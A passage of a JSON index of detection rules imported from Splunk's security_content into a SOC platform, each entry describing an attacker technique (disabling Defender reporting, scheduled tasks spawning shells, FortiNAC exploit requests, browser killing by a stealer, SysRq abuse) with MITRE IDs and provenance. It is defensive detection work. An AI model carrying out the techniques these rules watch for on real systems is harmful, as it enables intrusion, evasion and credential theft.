If confirmed malicious, this behavior could lead to the unauthorized transfer of sensitive information to command and control servers, posing a severe risk to data confidentiality and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-archive-collected-data-via-rar.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2015de95-fe91-413d-9d62-2fe011b67e82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_archive_collected_data_via_rar.yml" } }, { "id": "splunk-security-content-201946c6-b1d5-42bb-a7e0-5f7123f47fc4", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Report Infection", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender's infection reporting. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"DontReportInfectionInformation\" registry value. This activity is significant because it can prevent Windows Defender from reporting detailed threat information to Microsoft, suppressing telemetry that defenders rely on and potentially helping malware evade detection. 
If confirmed malicious, this action could enable attackers to bypass security measures, maintain persistence, and avoid detection, leading to prolonged unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-report-infection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "201946c6-b1d5-42bb-a7e0-5f7123f47fc4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_report_infection.yml" } }, { "id": "splunk-security-content-2032a95a-5165-11ec-a2c3-3e22fbd008af", "type": "detection", "name": "Randomly Generated Windows Service Name", "description": "The following analytic detects the installation of a Windows Service with a suspicious, high-entropy name, indicating potential malicious activity. It leverages Event ID 7045 and the `ut_shannon` function from the URL ToolBox Splunk application to identify services with random names. This behavior is significant as adversaries often use randomly named services for lateral movement and remote code execution. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/randomly-generated-windows-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2032a95a-5165-11ec-a2c3-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/randomly_generated_windows_service_name.yml" } }, { "id": "splunk-security-content-2038f5c6-5aba-4221-8ae2-ca76e2ca8b97", "type": "detection", "name": "Exploit Public-Facing Fortinet FortiNAC CVE-2022-39952", "description": "The following analytic detects attempts to exploit the Fortinet FortiNAC CVE-2022-39952 vulnerability. 
It identifies HTTP POST requests to the URI configWizard/keyUpload.jsp with a payload.zip file.\nThe detection leverages the Web datamodel, analyzing fields such as URL, HTTP method, and user agent.\nThis activity is significant as it indicates an attempt to exploit a known vulnerability, potentially leading to remote code execution.\nIf confirmed malicious, attackers could gain control over the affected system, schedule malicious tasks, and establish persistent access via a remote command and control (C2) server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/exploit-public-facing-fortinet-fortinac-cve-2022-39952.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2038f5c6-5aba-4221-8ae2-ca76e2ca8b97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/exploit_public_facing_fortinet_fortinac_cve_2022_39952.yml" } }, { "id": "splunk-security-content-203ef0ea-9bd8-11eb-8201-acde48001122", "type": "detection", "name": "WinEvent Scheduled Task Created to Spawn Shell", "description": "The following analytic detects the creation of scheduled tasks designed to execute commands using native Windows shells like PowerShell, Cmd, Wscript, or Cscript. It leverages Windows Security EventCode 4698 to identify when such tasks are registered. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. 
If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/winevent-scheduled-task-created-to-spawn-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "203ef0ea-9bd8-11eb-8201-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/winevent_scheduled_task_created_to_spawn_shell.yml" } }, { "id": "splunk-security-content-20901256-633a-40de-8753-7b88811a460f", "type": "detection", "name": "Linux Auditd Sysmon Service Stop", "description": "The following analytic detects the stopping of the Sysmon service on a Linux host, as observed in auditd events. This behavior is critical for a SOC to monitor because Sysmon supplies process, file, and network telemetry for the host, and stopping it removes that visibility; adversaries do this to evade detection before or while carrying out further activity. Legitimate administrative maintenance can also stop the service, so such events should be validated against change records. If confirmed malicious, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. 
Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-sysmon-service-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "20901256-633a-40de-8753-7b88811a460f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_sysmon_service_stop.yml" } }, { "id": "splunk-security-content-20ba6c32-c733-4a32-b64e-2688cf231399", "type": "detection", "name": "Suspicious PlistBuddy Usage via OSquery", "description": "The following analytic detects the use of the PlistBuddy utility on macOS to create or modify property list (.plist) files. It leverages OSQuery to monitor process events, specifically looking for commands that interact with LaunchAgents and set properties like RunAtLoad. This activity is significant because PlistBuddy can be used to establish persistence mechanisms, as seen in malware like Silver Sparrow. 
If confirmed malicious, this could allow an attacker to maintain persistence, execute arbitrary commands, and potentially escalate privileges on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1543.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/suspicious-plistbuddy-usage-via-osquery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "20ba6c32-c733-4a32-b64e-2688cf231399", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_plistbuddy_usage_via_osquery.yml" } }, { "id": "splunk-security-content-20db5f70-34b4-4e83-8926-fa26119de173", "type": "detection", "name": "Windows IIS Components Get-WebGlobalModule Module Query", "description": "The following analytic identifies the execution of the PowerShell cmdlet Get-WebGlobalModule, which lists all IIS Modules installed on a system. It leverages PowerShell input data to detect this activity by capturing the module names and the image paths of the DLLs. This activity is significant for a SOC because it can indicate an attempt to enumerate installed IIS modules, which could be a precursor to exploiting vulnerabilities or misconfigurations. 
If confirmed malicious, this could allow an attacker to gain insights into the web server's configuration, potentially leading to further exploitation or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-get-webglobalmodule-module-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "20db5f70-34b4-4e83-8926-fa26119de173", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_get_webglobalmodule_module_query.yml" } }, { "id": "splunk-security-content-21083dcb-276d-4ef9-8f7e-2113ca5e8094", "type": "detection", "name": "GitHub Enterprise Pause Audit Log Event Stream", "description": "The following analytic detects when a user pauses audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration changes that temporarily suspend the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by temporarily disabling the audit trail. For a SOC, identifying the pausing of audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected during the pause window. 
The impact could be severe as organizations temporarily lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection during the pause period. This creates a temporary blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-pause-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21083dcb-276d-4ef9-8f7e-2113ca5e8094", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_pause_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-211b80d3-6340-4345-11ad-212bf3d0d111", "type": "detection", "name": "AWS Lambda UpdateFunctionCode", "description": "The following analytic identifies IAM users that update or modify AWS Lambda function code via the AWS CLI. It leverages CloudTrail logs to detect successful `UpdateFunctionCode` events initiated by IAM users, so only completed code changes, not denied attempts, are surfaced. This activity is significant as it may indicate an attempt to gain persistence, further access, or plant backdoors within your AWS environment. 
If confirmed malicious, an attacker could upload and execute malicious code automatically when the Lambda function is triggered, potentially compromising the integrity and security of your AWS infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-lambda-updatefunctioncode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "211b80d3-6340-4345-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_lambda_updatefunctioncode.yml" } }, { "id": "splunk-security-content-213b3148-24ea-11ec-93a2-acde48001122", "type": "detection", "name": "MSBuild Suspicious Spawned By Script Process", "description": "The following analytic detects the suspicious spawning of MSBuild.exe by Windows Script Host processes (cscript.exe or wscript.exe). This behavior is often associated with malware or adversaries executing malicious MSBuild processes via scripts on compromised hosts. The detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process creation events where MSBuild is a child of script hosts. This activity is significant as it may indicate an attempt to execute malicious code. 
If confirmed malicious, it could lead to unauthorized code execution, potentially compromising the host and allowing further malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msbuild-suspicious-spawned-by-script-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "213b3148-24ea-11ec-93a2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msbuild_suspicious_spawned_by_script_process.yml" } }, { "id": "splunk-security-content-21421896-a692-4594-9888-5faeb8a53106", "type": "detection", "name": "O365 Mailbox Inbox Folder Shared with All Users", "description": "The following analytic detects instances where the inbox folder of an Office 365 mailbox is shared with all users within the tenant. It leverages Office 365 management activity events to identify when the 'Inbox' folder permissions are modified to include 'Everyone' with read rights. This activity is significant as it represents a potential security risk, allowing unauthorized access to sensitive emails. 
If confirmed malicious, this could lead to data breaches, exfiltration of confidential information, and further compromise through spear-phishing or other malicious activities based on the accessed email content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-mailbox-inbox-folder-shared-with-all-users.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21421896-a692-4594-9888-5faeb8a53106", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_mailbox_inbox_folder_shared_with_all_users.yml" } }, { "id": "splunk-security-content-21432e40-04f4-11ec-b7e6-acde48001122", "type": "detection", "name": "Get ADUser with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-AdUser` PowerShell cmdlet, which is used to enumerate all domain users. It leverages PowerShell Script Block Logging (EventCode=4104) to identify instances where this command is executed with a filter. This activity is significant as it may indicate an attempt by adversaries or Red Teams to gather information about domain users for situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further reconnaissance and potential exploitation of user accounts within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduser-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21432e40-04f4-11ec-b7e6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduser_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-2181ad1f-1e73-4d0c-9780-e8880482a08f", "type": "detection", "name": "Cloud API Calls From Previously Unseen User Roles", "description": "The following analytic detects cloud API calls executed by user roles that have not previously run these commands. It leverages the Change data model in Splunk to identify commands executed by users with the user_type of AssumedRole and a status of success. This activity is significant because new commands from different user roles can indicate potential malicious activity or unauthorized actions. 
If confirmed malicious, this behavior could lead to unauthorized access, data breaches, or other damaging outcomes by exploiting new or unmonitored commands within the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-api-calls-from-previously-unseen-user-roles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2181ad1f-1e73-4d0c-9780-e8880482a08f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_api_calls_from_previously_unseen_user_roles.yml" } }, { "id": "splunk-security-content-2181f261-93e6-4166-a5a9-47deac58feff", "type": "detection", "name": "Windows Information Discovery Fsutil", "description": "The following analytic identifies the execution of the Windows built-in tool FSUTIL with the \"FSINFO\" or \"Volume\" parameters, in order to discover file system and disk information.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details.\nMonitoring this activity is significant because FSUTIL can be abused by adversaries to gather detailed information about the file system, aiding in further exploitation.\nIf confirmed malicious, this activity could enable attackers to map the file system, identify valuable data, and plan subsequent actions such as privilege escalation or persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-information-discovery-fsutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2181f261-93e6-4166-a5a9-47deac58feff", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_information_discovery_fsutil.yml" } }, { "id": "splunk-security-content-218bf991-6c63-4c26-a682-6ac1a53ad8f8", "type": "detection", "name": "ESXi External Root Login Activity", "description": "This detection identifies instances where the ESXi UI is accessed using the root account instead of a delegated administrative user. 
Direct root access to the UI bypasses role-based access controls and undermines accountability, since actions performed as the shared root account cannot be attributed to an individual administrator; it may indicate risky behavior, misconfiguration, or unauthorized activity by a malicious actor using compromised credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-external-root-login-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "218bf991-6c63-4c26-a682-6ac1a53ad8f8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_external_root_login_activity.yml" } }, { "id": "splunk-security-content-21af5447-734f-4549-956b-7a255cb2b032", "type": "detection", "name": "HTTP PUA User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of potentially unwanted applications (PUA) by their user-agent strings. 
This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-pua-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21af5447-734f-4549-956b-7a255cb2b032", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_pua_user_agent.yml" } }, { "id": "splunk-security-content-21c5af91-1a4a-4511-8603-64fb41df3fad", "type": "detection", "name": "Windows SIP Provider Inventory", "description": "The following analytic identifies all SIP (Subject Interface Package) providers on a Windows system using PowerShell scripted inputs. It detects SIP providers by capturing DLL paths from relevant events. This activity is significant because malicious SIP providers can be used to bypass trust controls, potentially allowing unauthorized code execution. If confirmed malicious, this activity could enable attackers to subvert system integrity, leading to unauthorized access or persistent threats within the environment. 
Analysts should review for new and non-standard paths to identify potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sip-provider-inventory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21c5af91-1a4a-4511-8603-64fb41df3fad", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sip_provider_inventory.yml" } }, { "id": "splunk-security-content-21cbcaf1-b51f-496d-a0c1-858ff3070452", "type": "detection", "name": "Windows Modify Registry Disabling WER Settings", "description": "The following analytic detects modifications in the Windows registry to disable Windows Error Reporting (WER) settings. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to registry paths related to WER with a value set to \"0x00000001\". This activity is significant as adversaries may disable WER to suppress error notifications, hiding the presence of malicious activities. 
If confirmed malicious, this could allow attackers to operate undetected, potentially leading to prolonged persistence and further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disabling-wer-settings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "21cbcaf1-b51f-496d-a0c1-858ff3070452", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disabling_wer_settings.yml" } }, { "id": "splunk-security-content-220d34b7-b6c7-45fe-8dbb-c35cdd9fe6d5", "type": "detection", "name": "Windows Disable or Stop Browser Process", "description": "The following analytic detects the use of the taskkill command in a process command line to terminate several known browser processes, a technique commonly employed by the Braodo stealer malware to steal credentials. By forcefully closing browsers like Chrome, Edge, and Firefox, the malware can unlock files that store sensitive information, such as passwords and login data. This detection focuses on identifying taskkill commands targeting these browsers, signaling malicious intent. 
Early detection allows security teams to investigate and prevent further credential theft and system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-disable-or-stop-browser-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "220d34b7-b6c7-45fe-8dbb-c35cdd9fe6d5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_disable_or_stop_browser_process.yml" } }, { "id": "splunk-security-content-223572ab-8768-4e20-9b39-c38707af80dc", "type": "detection", "name": "Windows Account Access Removal via Logoff Exec", "description": "The following analytic detects the process of logging off a user through the use of the quser and logoff commands. By monitoring for these commands, the analytic identifies actions where a user session is forcibly terminated, which could be part of an administrative task or a potentially unauthorized access attempt. 
This detection helps identify potential misuse or malicious activity where a user\u2019s access is revoked without proper authorization, providing insight into potential security incidents involving account management or session manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-access-removal-via-logoff-exec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "223572ab-8768-4e20-9b39-c38707af80dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_access_removal_via_logoff_exec.yml" } }, { "id": "splunk-security-content-2246c142-a678-45f8-8546-aaed7e0efd30", "type": "detection", "name": "O365 Elevated Mailbox Permission Assigned", "description": "The following analytic identifies the assignment of elevated mailbox permissions in an Office 365 environment via the Add-MailboxPermission operation. It leverages logs from the Exchange workload in the o365_management_activity data source, focusing on permissions such as FullAccess, ChangePermission, or ChangeOwner. This activity is significant as it indicates potential unauthorized access or control over mailboxes, which could lead to data exfiltration or privilege escalation. 
If confirmed malicious, attackers could gain extensive access to sensitive email data and potentially manipulate mailbox settings, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-elevated-mailbox-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2246c142-a678-45f8-8546-aaed7e0efd30", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_elevated_mailbox_permission_assigned.yml" } }, { "id": "splunk-security-content-229dc225-6abe-4d28-89fd-edf874086162", "type": "detection", "name": "HTTP C2 Framework User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of C2 frameworks. 
This activity can signify malicious actors attempting to interact with hosts on the network using known default configurations of command and control tools.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-c2-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "229dc225-6abe-4d28-89fd-edf874086162", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_c2_framework_user_agent.yml" } }, { "id": "splunk-security-content-22ac27b4-7189-4a4f-9375-b9017c9620d7", "type": "detection", "name": "Detect RTLO In Process", "description": "The following analytic identifies the abuse of the right-to-left override (RTLO) character (U+202E) in process names. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line data. This activity is significant because adversaries use the RTLO character to disguise malicious files or commands, making them appear benign. 
If confirmed malicious, this technique can allow attackers to execute harmful code undetected, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-rtlo-in-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "22ac27b4-7189-4a4f-9375-b9017c9620d7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_rtlo_in_process.yml" } }, { "id": "splunk-security-content-22c03600-f84a-47fa-abaa-ffbe3e72c782", "type": "detection", "name": "Linux Magic SysRq Key Abuse", "description": "Detects potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges to manipulate or destabilize a system.\nWriting to /proc/sysrq-trigger can crash the system, kill processes, or bypass standard logging.\nMonitoring SysRq abuse helps detect stealthy post-exploitation activity.\nCorrelate with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.004", "T1529", "T1489", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
